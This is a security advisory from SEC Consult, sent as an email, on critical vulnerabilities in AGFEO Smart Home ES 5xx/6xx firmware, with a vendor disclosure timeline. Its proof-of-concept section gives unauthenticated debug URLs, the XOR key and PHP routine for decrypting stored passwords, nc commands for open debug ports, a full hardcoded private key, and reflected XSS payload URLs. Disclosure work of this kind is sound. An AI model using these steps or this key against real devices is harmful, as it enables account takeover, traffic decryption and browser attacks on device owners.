SEC Consult SA-20170712-0 :: Multiple critical vulnerabilities in AGFEO smart home ES 5xx/6xx products

--------------ms080309050908020306040606
Content-Type: text/plain; charset=utf-8
Content-Transfer-Encoding: quoted-printable

SEC Consult Vulnerability Lab Security Advisory < 20170712-0 >
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
              title: Multiple critical vulnerabilities
            product: AGFEO Smart Home ES 5xx
                     AGFEO Smart Home ES 6xx
 vulnerable version: at least 1.9b, 1.10
      fixed version: 1.12c
         CVE number: -
             impact: Critical
           homepage: https://www.agfeo.de/
              found: 2016-12-28
                 by: T. Weber (Office Vienna)
                     SEC Consult Vulnerability Lab

                     An integrated part of SEC Consult
                     Bangkok - Berlin - Linz - Luxembourg - Montreal - Mo=
scow
                     Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Z=
urich

                     https://www.sec-consult.com

=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D

Vendor description:
-------------------
AGFEO GmbH & Co. KG is a vendor of telephone systems and other
(tele-)communication products like DECT phones, headsets or smart home
products as well.


Business recommendation:
------------------------
The available patches should be installed immediately.

SEC Consult recommends not to use this product in a production environmen=
t
until a thorough security review has been performed by security professio=
nals
as there are indications for further security issues.


Vulnerability overview/description:
-----------------------------------
1) Unauthenticated access to web services and authentication bypass
A web service with multiple scripts for debug purposes is accessible
on an unusual port on the device. There is also a script to read files fr=
om
the filesystem. As the web service runs with root privileges all files
on the operating system can be read by an attacker. This only affects the=

ES 5xx product line, all other vulnerabilities affect both ES 5xx and 6xx=
=2E

The configuration of the device can be changed and arbitrary updates can =
be
uploaded as well as music files for the answering machine. By reading the=

database content, the usernames and their passwords can be revealed and e=
asily
decrypted. This way the administrator password can be dumped from the dat=
abase
and the device can be fully administrated by an attacker.
The normal user interface has an additional development subfolder which w=
as
probably used during the development process. Updates can be triggered fr=
om
this sub platform and log files, statistics and states can also be displa=
yed.


2) Unauthenticated access to configuration ports
Multiple different instances of TCP services are present on the device. E=
ach
of the listening sockets is forked from a debug and configuration service=
=2E
Internal device information can be read from the device. Among other comm=
ands,
the configuration of the device can also be altered by using these servic=
es.


3) Hardcoded cryptographic keys
Three certificates including their private keys are embedded in the firmw=
are
of AGFEO ES 5xx/6xx SmartHome products. The certificates and keys in both=

product lines are exactly the same. One certificate is used for HTTPS
(default server certificate for web based configuration and management).

Impersonation, man-in-the-middle or passive decryption attacks are possib=
le.
These attacks allow an attacker to gain access to sensitive information l=
ike
admin credentials and use them in further attacks.


4) Multiple reflected cross site scripting (XSS) vulnerabilities
The ES 5xx SmartHome products are vulnerable to reflected cross site scri=
pting.
Malicious JavaScript code can be executed in the browser of a victim by l=
uring
to a handcrafted link. This is possible even if the victim is not logged =
in.
It is assumed that the 6xx products are affected as well but those could =
not be
tested.


Proof of concept:
-----------------
1) Unauthenticated access to web services and authentication bypass
The debug web service is available by using the following url:
http://<Device-IP>:20011/index.html
There are different scripts accessible, the following actions can be exec=
uted:
    -) Change IP configuration
    -) Change time zone
    -) Upload updates (Any files can be uploaded to the device!)
    -) Read all files on the filesystem
    -) Play, delete and move voice messages on all mail boxes
    -) Converting mp3 files to wav files
    -) List all connected phones and the related numbers

The SQLite database is located under "/home/profile/poolstore.db". By rea=
ding
this file the usernames and passwords can be dumped. The passwords are en=
coded
with base64 and encrypted with XOR. To decrypt the XORed password the
following key has to be used:
    "0x42 0xab 0xce 0xfa 0x54 0xed 0xcf 0xba"

The function to decrypt the password was found in the php script "login.p=
hp":
function decodePassword($PasswordEnc)
{
    $PasswordBinaryEncBase64 =3D "";
    $PasswordBinaryEnc=3D"";
    $PasswordBinary =3D array();
    $Password =3D "";
    $lastChar=3D0;

    $Key=3Darray(0x42, 0xab, 0xce, 0xfa, 0x54, 0xed, 0xcf, 0xba);

    $PasswordBinaryEncBase64 =3D $PasswordEnc;

    // base64 decode
    $PasswordBinaryEnc =3D base64_decode($PasswordBinaryEncBase64);

    // xor decode
    for($i=3D0; $i<strlen($PasswordBinaryEnc); $i++) {
        $PasswordBinary[$i] =3D ord($PasswordBinaryEnc[$i]) ^ $Key[$i % c=
ount($Key)]
^ $lastChar;
        $lastChar =3D ord($PasswordBinaryEnc[$i]);
    }

    // erstes Zeichen entfernen (random char!)
    foreach ($PasswordBinary as $chr) {
      $Password .=3D chr($chr);
    }
    $Password =3D substr($Password, 1);
    // printf("%s:%d  Password %s
", __FUNCTION__, __LINE__, $Password);=

    return $Password;
}

An additional subfolder, which contains debug scripts, is available under=
 the
following location:
http://<Device-IP>/shdev/ui9.php

Updates can be triggered, logs can be shown and status messages can be ga=
thered
within this functionality. Furthermore, it is possible to debug the login=

process. Since there is a hardcoded user "admin" a brute force attack is =
also
possible.


2) Unauthenticated access to configuration ports
The following TCP ports can be accessed with "nc <Device-IP> -p <Port>":
19002, 19004, 19006, 19009, 19010, 19080, 19081
By connecting to one of these ports a debug interface spawns. For example=
 the
connection to port 19081:
$ nc 192.168.0.40 19081
Start Menue: <Return>
=3D=3D=3D=3D=3D=3D=3D=3D< UPDS - Menue >=3D=3D=3D=3D=3D=3D=3D=3D
s:  show state
h:  help
D:  DEBmod on
d:  DEBmod off
L:  LOG on
l:  LOG off
S:  SERVICE-SUBMENUE
q:  Quit telnet session
=3D=3D=3D=3D=3D=3D=3D=3D=3D NOT AKTIV =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
s
status ausgeben (noch nicht vollstaendig implementiert)
upds <Timestamp>    bState: 00
upds <Timestamp>    bLastReceiveBlockNum: 15
[...]
S
upds <Timestamp>
upds <Timestamp>  =3D=3D=3D=3D=3D service-menue =3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
upds <Timestamp>  help                 help
upds <Timestamp>  q                    quit
upds <Timestamp>  D                    dial
upds <Timestamp>  d                    disconnect
upds <Timestamp>  =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D NOT AKTIV =3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
service submenue


3) Hardcoded cryptographic keys
Refer to our study on hardcoded cryptographic secrets in embedded systems=
 for
further information.
http://blog.sec-consult.com/2016/09/house-of-keys-9-months-later-40-worse=
=2Ehtml
IoT Inspector (http://www.iot-inspector.com/) was used to identify this
vulnerability.

OpenSSL output for the certificate:
Certificate:
    Data:
        Version: 1 (0x0)
        Serial Number: 10293758115057549292 (0x8edac6778bccbfec)
    Signature Algorithm: sha256WithRSAEncryption
        Issuer: C=3DDE, ST=3DSome-State, L=3DBielefeld, O=3DAGFEO GmbH & =
Co. KG, OU=3DDev,
CN=3Dinfo/emailAddress=3Dinfo@agfeo.de
        Validity
            Not Before: Oct 21 14:03:55 2014 GMT
            Not After : Mar  8 14:03:55 2042 GMT
        Subject: C=3DDE, ST=3DSome-State, L=3DBielefeld, O=3DAGFEO GmbH &=
 Co. KG, OU=3DDev,
CN=3Dinfo/emailAddress=3Dinfo@agfeo.de
        Subject Public Key Info:
            Public Key Algorithm: rsaEncryption
                Public-Key: (2048 bit)
                Modulus:
                    00:be:79:ad:17:e8:c7:9e:63:b3:bb:67:ce:bd:79:
                    29:66:22:ce:63:99:6a:a5:31:f4:70:5f:3f:9d:11:
                    94:d6:65:8c:4e:43:6b:e4:d4:f1:f4:bd:81:4c:72:
                    67:50:10:09:b8:60:b3:cd:be:23:ce:9a:75:ec:e4:
                    7a:cf:3a:e2:f0:51:f9:a5:f3:c5:67:5d:01:e9:72:
                    68:b1:59:f5:5b:d8:dc:3e:1d:00:df:06:a6:07:06:
                    12:70:c7:97:05:a5:da:80:14:2c:c7:ae:6a:ef:a1:
                    1a:b8:f8:6b:71:5e:91:04:da:43:ba:cf:7c:ef:bd:
                    01:b7:15:a1:7b:8f:52:21:06:ad:48:b4:57:0c:b2:
                    ac:b2:14:fe:30:38:96:5e:28:b8:68:b2:d3:ee:8d:
                    28:3c:ac:a0:95:c8:07:39:b7:df:95:6d:88:a2:12:
                    77:31:a8:55:f6:ab:c7:17:16:03:5f:ca:f2:ca:8f:
                    fd:37:65:2c:b0:aa:47:59:fe:d6:ec:69:8f:db:b6:
                    9e:93:4b:f0:87:77:90:f6:5c:e4:64:d1:96:99:d5:
                    d8:37:e4:7d:2f:bd:f4:04:fd:67:13:bc:68:ea:e6:
                    00:dd:72:74:a2:fe:1a:00:27:8b:b8:96:a6:0c:93:
                    82:52:6d:61:2c:62:02:b2:e8:ab:45:e4:87:98:d2:
                    ba:57
                Exponent: 65537 (0x10001)
    Signature Algorithm: sha256WithRSAEncryption
         37:12:cb:94:9a:51:f8:9a:04:9f:60:19:6a:12:23:38:10:85:
         b5:79:2b:49:5d:b6:65:82:76:c0:0b:20:d1:bf:04:ce:46:38:
         56:ea:0b:2e:41:f5:61:d1:12:d4:ce:34:d9:e3:2a:bb:e8:9f:
         f1:0e:0d:da:37:91:ee:92:dd:9a:85:91:14:a2:21:87:da:52:
         33:d6:ec:74:c0:3a:46:7f:82:02:91:75:99:ad:fd:72:1b:ec:
         00:64:10:e1:9c:81:3b:c9:8e:6b:73:d5:e1:df:7b:60:d4:b6:
         08:51:30:25:b1:a0:ed:f0:de:2e:15:33:c2:bf:c3:fe:69:1b:
         a8:26:c3:25:f0:53:8e:1f:8a:aa:44:f4:59:88:5b:7d:27:d6:
         a5:a9:e8:26:a9:ba:75:f0:84:5d:e0:e7:03:75:a0:a6:64:c4:
         16:ce:88:16:ca:72:f2:43:7a:08:b5:e3:48:d7:c3:a1:3a:28:
         43:3c:5a:30:d4:31:dc:68:a5:5c:da:7c:20:7b:ee:e6:a2:04:
         a3:3e:f1:5d:39:f4:89:d7:f0:f3:b4:e6:5e:81:cd:60:34:61:
         ef:e1:d8:59:f9:d0:5a:11:af:53:03:93:4a:9e:fb:1e:a3:8b:
         94:90:de:59:91:59:ff:f3:1b:5a:ef:7f:aa:33:c2:47:50:05:
         0a:bc:62:3c

Certificate:
-----BEGIN CERTIFICATE-----
MIIDnDCCAoQCCQCO2sZ3i8y/7DANBgkqhkiG9w0BAQsFADCBjzELMAkGA1UEBhMC
REUxEzARBgNVBAgMClNvbWUtU3RhdGUxEjAQBgNVBAcMCUJpZWxlZmVsZDEcMBoG
A1UECgwTQUdGRU8gR21iSCAmIENvLiBLRzEMMAoGA1UECwwDRGV2MQ0wCwYDVQQD
DARpbmZvMRwwGgYJKoZIhvcNAQkBFg1pbmZvQGFnZmVvLmRlMB4XDTE0MTAyMTE0
MDM1NVoXDTQyMDMwODE0MDM1NVowgY8xCzAJBgNVBAYTAkRFMRMwEQYDVQQIDApT
b21lLVN0YXRlMRIwEAYDVQQHDAlCaWVsZWZlbGQxHDAaBgNVBAoME0FHRkVPIEdt
YkggJiBDby4gS0cxDDAKBgNVBAsMA0RldjENMAsGA1UEAwwEaW5mbzEcMBoGCSqG
SIb3DQEJARYNaW5mb0BhZ2Zlby5kZTCCASIwDQYJKoZIhvcNAQEBBQADggEPADCC
AQoCggEBAL55rRfox55js7tnzr15KWYizmOZaqUx9HBfP50RlNZljE5Da+TU8fS9
gUxyZ1AQCbhgs82+I86adezkes864vBR+aXzxWddAelyaLFZ9VvY3D4dAN8GpgcG
EnDHlwWl2oAULMeuau+hGrj4a3FekQTaQ7rPfO+9AbcVoXuPUiEGrUi0VwyyrLIU
/jA4ll4ouGiy0+6NKDysoJXIBzm335VtiKISdzGoVfarxxcWA1/K8sqP/TdlLLCq
R1n+1uxpj9u2npNL8Id3kPZc5GTRlpnV2DfkfS+99AT9ZxO8aOrmAN1ydKL+GgAn
i7iWpgyTglJtYSxiArLoq0Xkh5jSulcCAwEAATANBgkqhkiG9w0BAQsFAAOCAQEA
NxLLlJpR+JoEn2AZahIjOBCFtXkrSV22ZYJ2wAsg0b8EzkY4VuoLLkH1YdES1M40
2eMqu+if8Q4N2jeR7pLdmoWRFKIhh9pSM9bsdMA6Rn+CApF1ma39chvsAGQQ4ZyB
O8mOa3PV4d97YNS2CFEwJbGg7fDeLhUzwr/D/mkbqCbDJfBTjh+KqkT0WYhbfSfW
panoJqm6dfCEXeDnA3WgpmTEFs6IFspy8kN6CLXjSNfDoTooQzxaMNQx3GilXNp8
IHvu5qIEoz7xXTn0idfw87TmXoHNYDRh7+HYWfnQWhGvUwOTSp77HqOLlJDeWZFZ
//MbWu9/qjPCR1AFCrxiPA=3D=3D
-----END CERTIFICATE-----

Private Key:
-----BEGIN PRIVATE KEY-----
MIIEvwIBADANBgkqhkiG9w0BAQEFAASCBKkwggSlAgEAAoIBAQC+ea0X6MeeY7O7
Z869eSlmIs5jmWqlMfRwXz+dEZTWZYxOQ2vk1PH0vYFMcmdQEAm4YLPNviPOmnXs
5HrPOuLwUfml88VnXQHpcmixWfVb2Nw+HQDfBqYHBhJwx5cFpdqAFCzHrmrvoRq4
+GtxXpEE2kO6z3zvvQG3FaF7j1IhBq1ItFcMsqyyFP4wOJZeKLhostPujSg8rKCV
yAc5t9+VbYiiEncxqFX2q8cXFgNfyvLKj/03ZSywqkdZ/tbsaY/btp6TS/CHd5D2
XORk0ZaZ1dg35H0vvfQE/WcTvGjq5gDdcnSi/hoAJ4u4lqYMk4JSbWEsYgKy6KtF
5IeY0rpXAgMBAAECggEAI7joKJrEjUT/mT8Pu+M0S25trKpCIPcsc8K5SHjapBbp
aGgmnQT+17qOvEqca5yGZijkr8pgJsg7I5F6ItFVbGLDYkdEl20PBbwqPFC1vmL+
czu3RRyXGKwf2zzjavC++NRPzac9cPGS9GvKorlsky9oEmoFcWTOJIsO/QBVE9I8
hPc5utxQQ5WTDfUD84Y2ELJx/qhZNB8gOF+KhDQT0slE1/7Y7sHMi++kxVj+KiVb
Kif3DxpB6reMP5s1zhmfJcF9pPrr6jT35OuEjQ15y9p9wrLL1txfJbi3O6Ucwd3q
INHugNN/v+/6ia06aZtknxYoG+hFS7PbulU11VSimQKBgQDzoQRtO0MjEo3Gucqi
iaxpueYsAizJx9GkdCh7StN8ZWADpZj6x7B6vIhjXZO6Q5bM6j838lYWyNYsBHpq
FXeAM8cPIm7xUpRQDLKfhU9YA9/6iQ8/dzTYR49uj67syc9HH9dIOsRyVAy2ci6S
UySE3aTSCJCwSerpFZWoPqsbOwKBgQDIJbQQg+QnAOdTYdmIQv8zW6nLvuwLzNkP
wxFlZ/78DI8+2h1H5LGd/2C2ybKIsif/pU5u721qkqxIrIc1I3BWcX+O+QwiJ1oO
SBeA3gzcD7IOpW2GqyN8tt8cWo48moDjIcSYGB6mSd0WmX7MfsOxnEybLWQIKHD4
sTclSDuTlQKBgQDZyRGk97oPazGT+Vf8LmgS5xysMJGLG3X7td7OQFiHtjO7btgv
Lj1Dqq+da/R4KJ1wtuImiBqPKZ/TH3myxVfbIe4LSHO2hGSSnpc65LfF7UjWtJkN
2elCgc3lPspXYBxL71nKdsZPkXT/z1h0c6CMqXoCS6fT/2/gRuxOxx68KwKBgQCo
SEM465wmSzU0v34GesZWKUj/nXycg1UyUoJK8ADNbcX3Q68A5sGMpc9sgPQSyTCm
WxgyYC9wPviKdj2MqUpn9DAbRz0zbkDi5yyT1p+bW7sLY35Oj5Bb6Op4zY7wV7vs
vVStyQHkMRCqUs7xI9hoepFSm/ySe2ZZQ6+pMi2dbQKBgQCn9FdGZzWOAIXrfj7Q
SoMEUPEIEdxXYEy8Rudh9VVIJQW4tvYX6mQMr8fgx5RKRaTsL1Qv/tn9XGq00wes
3NuLEq2urJAC7z8smqkvWm2xo91j+ExeRL66CfPdm5KPyaCXcuFysz5/LUKxG/a3
+K62TQB1mEb1t9WQsxJYGcUiyg=3D=3D
-----END PRIVATE KEY-----


4) Multiple reflected cross site scripting (XSS) vulnerabilities
The following crafted requests can be used to trigger the cross site scri=
pting
vulnerability at different entry points:
http://<Device-IP>:20011/ais.php/%22%3E%3Cscript%3Ealert%28XSS%29%3C%2f=
script%3E
http://<Device-IP>:20011/xtopbxwav.php/%22%3E%3Cscript%3Ealert%28XSS%29=
%3C%2fscript%3E
http://<Device-IP>:20011/update.php/%22%3E%3Cscript%3Ealert%28XSS%29%3C=
%2fscript%3E
http://<Device-IP>/pbxapi/licence.php/%3Cimg%20src=3Dx%20onerror=3Dalert%=
28XSS%29%3E
http://<Device-IP>/pbxapi/eoimport.php/%3Cimg%20src=3Dx%20onerror=3Dalert=
%28XSS%29%3E
http://<Device-IP>/pbxapi/knximport.php/%3Cimg%20src=3Dx%20onerror=3Daler=
t%28XSS%29%3E
http://<Device-IP>/pbxapi/hmimport.php/%3Cimg%20src=3Dx%20onerror=3Dalert=
%28XSS%29%3E


Vulnerable / tested versions:
-----------------------------
One firmware is available for the whole ES 5 product line, and another on=
e for
the product line ES 6. Therefore, all vulnerabilities which have been fou=
nd in
one product of ES 5/6 are also available in all other products of ES 5/6.=


The following product / firmware version has been tested by SEC Consult:
ES 512 Version 1.9b (es5xxv19b_c063be6)
ES 512 Version 1.10 (es5xxv110_f105485)

Based on results of the SEC Technologies IoT Inspector
(http://www.iot-inspector.com/ - automated firmware analysis tool) we bel=
ieve
that the product line ES 6 is also prone to the identified vulnerabilitie=
s
(except the web service on port 20011) as well as product line ES 5.

Firmware Version 1.9b (ES6xxv19b_c063be67b9c2ba)
Firmware Version 1.10 (ES6xxv110_f105485715a360)


Vendor contact timeline:
------------------------
2017-01-10: Contacting vendor through info@agfeo.de and set release date
            to 2017-03-01 according to SEC Consult responsible disclosure=

            policy.
2017-01-12: Contact asks for getting the security advisory unencrypted.
            Sending security advisory unencrypted.
2017-01-17: Call with vendor. Vendor is working on a fix of the found
            vulnerabilities.
2017-02-06: Asking for status update via mail; Contact responds that
            most of the vulnerabilities are fixed and a new version will
            be available soon.
2017-02-22: Asking for status update via mail. Contact responds that
            a new firmware is available soon.
2017-02-24: New firmware version is 1.12 for ES 5/6 series.
2017-02-28: The firmware will be available in CW11. Shifting release of
            advisory to 2017-03-15.
2017-03-13: Asked for a status update.
2017-03-14: Vendor responds that the update will be available on
            2017-03-21. Shifted release to 2017-03-21.
2017-03-20: Asked vendor when the updated firmware is available as
            download; Vendor responds that the updated firmware which
            contains fixes for all vulnerabilities can be received after
            contacting their Hotline. They also stated that the update
            will be available on the homepage in the next few days.
            Informed the vendor that the advisory will be published
            when the update is available on the homepage in the next
            few days. Shifted release to CW14.
2017-04-05: Asked for status update. Vendor responds that firmware will
            be available next week. Shifted release to unknown.
2017-04-24: Asked whether the download is available or not. Firmware
            will be available next week.
2017-04-25: Found new version 1.12a for ES 6xx on vendor home page.
2017-05-26: Found new version 1.11a for ES 5xx on vendor home page.
2017-05-29: Asked whether the current firmware contains all the fixes.
            Vendor responds that only a part of the vulnerabilities
            is fixed. They also state that v1.12b is for all products
            except "ES5xx up" will be available this week. This
            firmware contains all fixes.
2017-06-06: Asked vendor for the actual state, because the contact said
            that all vulnerabilities are fixed and the firmware can be
            received after calling the hotline. Asked vendor which
            vulnerabilities are actually fixed; No answer.
2017-06-14: Informed vendor that the advisory will be published on
            2017-07-12 because of the long "ping-pong" game without
            real outcome.
2017-06-22: Contact stated that version 1.12c will be available next
            week.
2017-07-03: Found new version 1.12c for ES 5/6/7 on vendor home page
            (available since 2017-06-30).
2017-07-12: Coordinated release of security advisory.


Solution:
---------
Call AGFEO hotline (+49 521 44709-0) or log in to the vendor home page
to get the newest firmware version.


Workaround:
-----------
None


Advisory URL:
-------------
https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SEC Consult Vulnerability Lab

SEC Consult
Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow
Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich

About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. I=
t
ensures the continued knowledge gain of SEC Consult in the field of netwo=
rk
and application security to stay ahead of the attacker. The SEC Consult
Vulnerability Lab supports high-quality penetration testing and the evalu=
ation
of new offensive and defensive technologies for our customers. Hence our
customers obtain the most current information about vulnerabilities and v=
alid
recommendation about the risk profile of new technologies.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Interested to work with the experts of SEC Consult?
Send us your application https://www.sec-consult.com/en/Career.htm

Interested in improving your cyber security with the experts of SEC Consu=
lt?
Contact our local offices https://www.sec-consult.com/en/About/Contact.ht=
m
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult

EOF T. Weber / @2017


--------------ms080309050908020306040606
Content-Type: application/pkcs7-signature; name="smime.p7s"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="smime.p7s"
Content-Description: S/MIME Cryptographic Signature

MIAGCSqGSIb3DQEHAqCAMIACAQExDzANBglghkgBZQMEAgEFADCABgkqhkiG9w0BBwEAAKCC
CxgwggSvMIIDl6ADAgECAhEA4CPLFRKDU4mtYW56VGdrITANBgkqhkiG9w0BAQsFADBvMQsw
CQYDVQQGEwJTRTEUMBIGA1UEChMLQWRkVHJ1c3QgQUIxJjAkBgNVBAsTHUFkZFRydXN0IEV4
dGVybmFsIFRUUCBOZXR3b3JrMSIwIAYDVQQDExlBZGRUcnVzdCBFeHRlcm5hbCBDQSBSb290
MB4XDTE0MTIyMjAwMDAwMFoXDTIwMDUzMDEwNDgzOFowgZsxCzAJBgNVBAYTAkdCMRswGQYD
VQQIExJHcmVhdGVyIE1hbmNoZXN0ZXIxEDAOBgNVBAcTB1NhbGZvcmQxGjAYBgNVBAoTEUNP
TU9ETyBDQSBMaW1pdGVkMUEwPwYDVQQDEzhDT01PRE8gU0hBLTI1NiBDbGllbnQgQXV0aGVu
dGljYXRpb24gYW5kIFNlY3VyZSBFbWFpbCBDQTCCASIwDQYJKoZIhvcNAQEBBQADggEPADCC
AQoCggEBAImxDdp6UxlOcFIdvFamBia3uEngludRq/HwWhNJFaO0jBtgvHpRQqd5jKQi3xdh
TpHVdiMKFNNKAn+2HQmAbqUEPdm6uxb+oYepLkNSQxZ8rzJQyKZPWukI2M+TJZx7iOgwZOak
+FaA/SokFDMXmaxE5WmLo0YGS8Iz1OlAnwawsayTQLm1CJM6nCpToxDbPSBhPFUDjtlOdiUC
ISn6o3xxdk/u4V+B6ftUgNvDezVSt4TeIj0sMC0xf1m9UjewM2ktQ+v61qXxl3dnUYzZ7ifr
vKUHOHaMpKk4/9+M9QOsSb7K93OZOg8yq5yVOhM9DkY6V3RhUL7GQD/L5OKfoiECAwEAAaOC
ARcwggETMB8GA1UdIwQYMBaAFK29mHo0tCb3+sQmVO8DveAky1QaMB0GA1UdDgQWBBSSYWuC
4aKgqk/sZ/HCo/e0gADB7DAOBgNVHQ8BAf8EBAMCAYYwEgYDVR0TAQH/BAgwBgEB/wIBADAd
BgNVHSUEFjAUBggrBgEFBQcDAgYIKwYBBQUHAwQwEQYDVR0gBAowCDAGBgRVHSAAMEQGA1Ud
HwQ9MDswOaA3oDWGM2h0dHA6Ly9jcmwudXNlcnRydXN0LmNvbS9BZGRUcnVzdEV4dGVybmFs
Q0FSb290LmNybDA1BggrBgEFBQcBAQQpMCcwJQYIKwYBBQUHMAGGGWh0dHA6Ly9vY3NwLnVz
ZXJ0cnVzdC5jb20wDQYJKoZIhvcNAQELBQADggEBABsqbqxVwTqriMXY7c1V86prYSvACRAj
mQ/FZmpvsfW0tXdeDwJhAN99Bf4Ss6SAgAD8+x1banICCkG8BbrBWNUmwurVTYT7/oKYz1gb
4yJjnFL4uwU2q31Ypd6rO2Pl2tVz7+zg+3vio//wQiOcyraNTT7kSxgDsqgt1Ni7QkuQaYUQ
26Y3NOh74AEQpZzKOsefT4g0bopl0BqKu6ncyso20fT8wmQpNa/WsadxEdIDQ7GPPprsnjJT
9HaSyoY0B7ksyuYcStiZDcGG4pCS+1pCaiMhEOllx/XVu37qjIUgAmLq0ToHLFnFmTPyOInl
tukWeh95FPZKEBom+nyK+5swggZhMIIFSaADAgECAhAriv4GJbNgG4KONRhUqx20MA0GCSqG
SIb3DQEBCwUAMIGbMQswCQYDVQQGEwJHQjEbMBkGA1UECBMSR3JlYXRlciBNYW5jaGVzdGVy
MRAwDgYDVQQHEwdTYWxmb3JkMRowGAYDVQQKExFDT01PRE8gQ0EgTGltaXRlZDFBMD8GA1UE
AxM4Q09NT0RPIFNIQS0yNTYgQ2xpZW50IEF1dGhlbnRpY2F0aW9uIGFuZCBTZWN1cmUgRW1h
aWwgQ0EwHhcNMTcwMzAxMDAwMDAwWhcNMjAwMjI5MjM1OTU5WjCCAVcxCzAJBgNVBAYTAkFU
MQ0wCwYDVQQREwQyNzAwMRowGAYDVQQIExFOaWVkZXJvZXN0ZXJyZWljaDEVMBMGA1UEBxMM
V3IuIE5ldXN0YWR0MRkwFwYDVQQJExBLb21hcmlnYXNzZSAxNC8xMS4wLAYDVQQKEyVTRUMg
Q29uc3VsdCBVbnRlcm5laG1lbnNiZXJhdHVuZyBHbWJIMUkwRwYDVQQLE0BJc3N1ZWQgdGhy
b3VnaCBTRUMgQ29uc3VsdCBVbnRlcm5laG1lbnNiZXJhdHVuZyBHbWJIIEUtUEtJIE1hbmFn
MR8wHQYDVQQLExZDb3Jwb3JhdGUgU2VjdXJlIEVtYWlsMSYwJAYDVQQDEx1TRUMgQ29uc3Vs
dCBWdWxuZXJhYmlsaXR5IExhYjEnMCUGCSqGSIb3DQEJARYYcmVzZWFyY2hAc2VjLWNvbnN1
bHQuY29tMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA5+LisxDXcLwArMnTESPr
5G/6PY0xWAvPc81sZGgHbf4at31qtZn9eVMGAPx4nJShJVZsB3+0OavWSM1PvcsMgVp8ovIf
gnE05A/LZ4k38pMU+Zl0pcGx5TFQevKmCDwqV9JqLIoleIKHCeQVmZhGC7zccEYvKtvQqWsq
VJDFHPZisoIGl9YS048T8c9al1FQtIx3SDtxZhyigHI1t8kFAHloWGP8KCMIMX6g9FlTIlnQ
YFUAkQ/49KRyUDEHdRZey9hQLuvrgRKWZn1TxeTWW41IZKUQC6Lhb3LgrQzUQoR7dbdASh+3
sqiw1642dkyxChRoOptpoC1Wo5HLTELzYQIDAQABo4IB4DCCAdwwHwYDVR0jBBgwFoAUkmFr
guGioKpP7GfxwqP3tIAAwewwHQYDVR0OBBYEFBEBR5dneBkup36i0hf8pUVsEpMlMA4GA1Ud
DwEB/wQEAwIFoDAMBgNVHRMBAf8EAjAAMB0GA1UdJQQWMBQGCCsGAQUFBwMEBggrBgEFBQcD
AjBGBgNVHSAEPzA9MDsGDCsGAQQBsjEBAgEDBTArMCkGCCsGAQUFBwIBFh1odHRwczovL3Nl
Y3VyZS5jb21vZG8ubmV0L0NQUzBdBgNVHR8EVjBUMFKgUKBOhkxodHRwOi8vY3JsLmNvbW9k
b2NhLmNvbS9DT01PRE9TSEEyNTZDbGllbnRBdXRoZW50aWNhdGlvbmFuZFNlY3VyZUVtYWls
Q0EuY3JsMIGQBggrBgEFBQcBAQSBgzCBgDBYBggrBgEFBQcwAoZMaHR0cDovL2NydC5jb21v
ZG9jYS5jb20vQ09NT0RPU0hBMjU2Q2xpZW50QXV0aGVudGljYXRpb25hbmRTZWN1cmVFbWFp
bENBLmNydDAkBggrBgEFBQcwAYYYaHR0cDovL29jc3AuY29tb2RvY2EuY29tMCMGA1UdEQQc
MBqBGHJlc2VhcmNoQHNlYy1jb25zdWx0LmNvbTANBgkqhkiG9w0BAQsFAAOCAQEAQ9HL1/pw
/3RSCgHwSKfAejchG11KoLrm+7xdqBC1nVgJaQeX8smjraljd1PAL4KthtNP0Tr+DNr4d4hQ
WwHz/LnB0iap44v8LTaHTDUbWYD5NsOg8sD1JMQI8Jt6vC7Im+9O/rHxmvhL18hWoK4aIK/k
QG7eOfO5UmurKh7StuhE3t4KKEQnSTUCy+kNe8ut4KZdRs+o+mpSH09ecLo99Qs/FuaZMTgh
hZWkcSC1YT1jQDIF3lRDk+/+HbQ0h34tgPi/wJlI/7moci7B2AzYWFeHWcrGnuE6kZkRWtQV
F/u1NODSMp1DU3EzHLueYNufSYLWHh+yyzNnaoP5u7oLeDGCBEEwggQ9AgEBMIGwMIGbMQsw
CQYDVQQGEwJHQjEbMBkGA1UECBMSR3JlYXRlciBNYW5jaGVzdGVyMRAwDgYDVQQHEwdTYWxm
b3JkMRowGAYDVQQKExFDT01PRE8gQ0EgTGltaXRlZDFBMD8GA1UEAxM4Q09NT0RPIFNIQS0y
NTYgQ2xpZW50IEF1dGhlbnRpY2F0aW9uIGFuZCBTZWN1cmUgRW1haWwgQ0ECECuK/gYls2Ab
